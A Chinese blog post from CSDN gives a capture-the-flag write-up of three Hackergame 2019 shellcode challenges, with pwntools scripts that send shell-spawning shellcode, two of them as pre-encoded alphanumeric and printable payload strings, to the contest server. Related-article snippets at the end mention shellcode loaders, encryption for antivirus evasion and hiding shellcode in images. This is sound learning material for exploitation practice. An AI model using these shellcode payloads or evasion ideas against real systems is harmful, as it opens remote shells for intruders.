关于简单的shellcode的学习

最新推荐文章于 2024-06-13 09:54:42 发布
最新推荐文章于 2024-06-13 09:54:42 发布
阅读量213 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45097188/article/details/102749918
版权

题目(hackergame2019→shell骇客)

题目文件下载(提取码:emuy)

chall1

chall1
对文件分析完发现只需要生成一个不超过0x200长度的shellcode填充栈即可
如果不了解shellcraft可以参考https://www.jianshu.com/p/355e4badab50

exp

from pwn import *
context(arch = 'amd64', os = 'linux')
p = remote('202.38.93.241', 10000)
p.recvuntil(":")
shellcode = asm(shellcraft.sh())
p.send(shellcode)
p.interactive()

chall2

chall2
通过ASCII码表发现限制的条件是0-9和A-Z,想到利用pwnlibc.encoders生成的shellcode.然后利用alpha3.py对pwnlibc.encoders生成的shellcode进行转换,最终成功执行shellcode。

关于pwnlibc.encoders
关于alpha3.py使用的例子

exp

    from pwn import *
    context(arch = 'i386', os = 'linux')
    r = remote('202.38.93.241', 10002)
    r.recvuntil(":")
    r.send('PYVTX10X41PZ41H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2O0Z2G7O1E7M04KO1P0S2L0Y3T3CKL0J0N000Q5A1W66MN0Y0X021U9J622A0H1Y0K3A7O5I3A114CKO0J1Y4Z5F06')
    r.interactive()

chall3

在这里插入图片描述
与第二题类似,同样是限制条件ASCII内dec值为32到126

exp

    from pwn import *
    context(arch = 'amd64', os = 'linux')
    r = remote('202.38.93.241', 10004)
    r.recvuntil(":")
    r.send('Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t')
    r.interactive()
Eternalstay
关注
vbs shellcode转换escape加密
09-06
总之,通过上述知识点的学习,我们可以深入了解如何使用VBS来处理和加密shellcode,这对于从事网络安全研究的专业人士来说是非常有用的技能。同时,也提醒大家要合理使用这些技术,避免非法用途。
PWN:[Week1]safe_shellcode
m0_53932372的博客
10-19 609
pwn
探索ALPHA3:高级全字母数字shellcode编码器
最新发布
gitblog_00061的博客
06-13 447
探索ALPHA3:高级全字母数字shellcode编码器 alpha3 Alphanumeric shellcode encoder. 项目地址: https://gitcode.com/gh_mirrors/al/alpha3 ...
[BUUCTF]PWN——mrctf2020_shellcode_revenge(可见字符shellcode
mcmuyanga的博客
03-15 4045
mrctf2020_shellcode_revenge 例行检查,64位程序,开启了RELRO和PIE 本地运行看一下大概的情况 64位ida载入,没法f5,直接看汇编 jg大于则跳转,jl小于则跳转,jump无条件跳转 要让程序继续执行下去,肯定是跳转loc_11AC loc_123A loc_11B8 cdqe使用eax的最高位拓展rax高32位的所有位 movzx则是按无符号数传送+扩展(16-32) EAX是32位的寄存器,而AX是EAX的低16位,AH是ax的高8位,而AL是ax的低
BUUCTF-PWN刷题记录-9
weixin_44145820的博客
04-17 1650
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
pwn1及ROP总结
weixin_44464829的博客
11-08 571
Babystack 本题,用 checksec 检查二进制,发现开启了 CANARY、NX、以及 RELRO 保护,CANARY 是用 来检测栈溢出的,canary 是一个随机数,存储在栈里。程序通过对比栈里的 canary 值和读 取到的实际 canary 值进行对比,如果不相等,则抛出异常。因此,为了绕过 canary 机制, 我们需要先想泄露 canary 的值,然后利用栈溢出,把这个值放到 payload 中对应的位置里, 这样,程序发现 canary 的值没变,我们就成功绕过。
shellcode加载器用于加密shellcode的py小玩意
10-03
3. **加密算法**:由于描述中提到"用于加密shellcode",所以加载器可能使用了某种加密算法,如AES(高级加密标准)或简单的异或(XOR)加密,以隐藏shellcode的内容,使其难以被静态分析工具识别。 4. **反病毒绕过**...
shellcode简单例子
10-28
### Shellcode简单例子解析 #### 一、Shellcode概述 Shellcode是一种小段的机器码,主要用于实现特定功能,如创建一个系统级别的shell或者执行某些特定操作等。它经常被用在安全研究领域,尤其是缓冲区溢出攻击中...
MakeCode:DLL转换为Shellcode
05-19
标题 "MakeCode: DLL转换为Shellcode" 涉及的是在编程领域中关于二进制代码转换的一个技术。Shellcode是一种特殊的机器码,通常用于在计算机内存中执行,尤其在安全攻防领域中有着重要应用。DLL(动态链接库)是...
详解缓冲区溢出-ShellCode提取等
08-22
这算是比较详细的讲解缓冲区溢出攻防等利用手段 从入门到精通 我相信看完后 哪怕对缓冲区溢出闻所未闻的人 也能成为一个高手 个中意识及生动的讲解方式 课后练习等~~ 相对这方面的知识网上还很少 而且入门级的就更少了 这里忍疼风险出来 需要的账户和密码已经打包在压缩文件中
关于利用alpha3生成可打印shellcode的报错的解决
Probeginner的博客
06-01 468
最开始python sc.py > shellcode执行这条语句老出错, 这后来又是winhex下载又是VMtool安装的,太麻烦的,最后机缘巧合,发现这样可以成功: 直接git clone 而后用python3而不是python2去运行sc.py而后直接 python ./ALPHA~~
shellcode基本知识(PWN
weixin_51758733的博客
07-15 963
shellcode基本知识(PWN
Python 3.10 第二个 alpha 版来了!一些可以关注的新特性
哦,原来你也在这里。
11-26 2342
Python3.9 刚刚发布不久,Python3.10 的第二个 alpha 版本也已于 11 月初发布。透过这个版本,我们或许可以一窥 Python 的未来改变。 Python3.10 第二个 alpha 版本的新功能包括以下三大部分: 类型注释扩展 为什么类型注释很重要 新方法和行为 Python3.9 版本对类型提示与注释进行了彻底的修改和清理。Python3.10 版本似乎延续了这一趋势,Python3.10 alpha 2 版本将类型注释功能进行了扩展。 类型注释的延迟评估 类型注
α冲刺 (3/10)
a111111132的博客
11-01 100
前言 失心疯病源3 团队代码管理github 站立会议 队名:PMS 530雨勤(组长) 今天完成了那些任务 16:00~20:18 援助行人模块并确定最终框架,顺便不死心的又找了一波车辆检测的demo 20:18~21:50 验证blob的实时性,寻找使用blob方法下区分人群与车辆的方法,以及初步的代码实现 代码签入github 明天的计划 继续代码实现,完成背景构建...
手把手教你写纯字符ascii shellcode——最通俗易懂的alphanumeric shellcode生成指南
HiTaQini
05-31 5889
ascii shellcode : 自动生成shellcode,手写shellcode
Pwntools的context设置与shellcode
半岛铁盒的博客
02-27 4721
文章目录一、context二、汇编与shellcode简单的例子???? 一、context context 是 pwntools 用来设置环境的功能。在很多时候,由于二进制文件的情况不同,我们可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问题。 一般来说我们设置context只需要简单的一句话: context(os='linux', arch='amd64', log_level='debug') 或者 con
BUUCTF-pwn(11)
njh18790816639的博客
01-09 2761
mrctf2020_easy_equation 简单的栈溢出漏洞,格式化字符串漏洞!此处采用栈溢出漏洞! axb_2019_fmt64 经典循环格式化字符串64位漏洞! 唯一注意的地方pwntools的FmtStr_payload无法成功获取权限!需要手动计算字节进行攻击! from elftools.construct.macros import Padding from pwn import * from LibcSearcher import * context(log_level='debu
hnctf-pwn-[week1]
m0_64174759的博客
11-20 1747
hnctf pwn week1 WP,栈溢出,格式化字符串,32位,64位rop,ret2shellcode,可见字符串,格式化字符串
利用图片隐藏Shellcode的技巧分析
"这篇资料是关于壳码(Shellcode)隐藏技术的,主要探讨如何将Shellcode藏在图片等不同的文件格式中,以此规避安全检测。由iDefense Labs的研究员Greg MacManus和Michael Sutton共同讲解,内容涵盖了Shellcode的历史...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值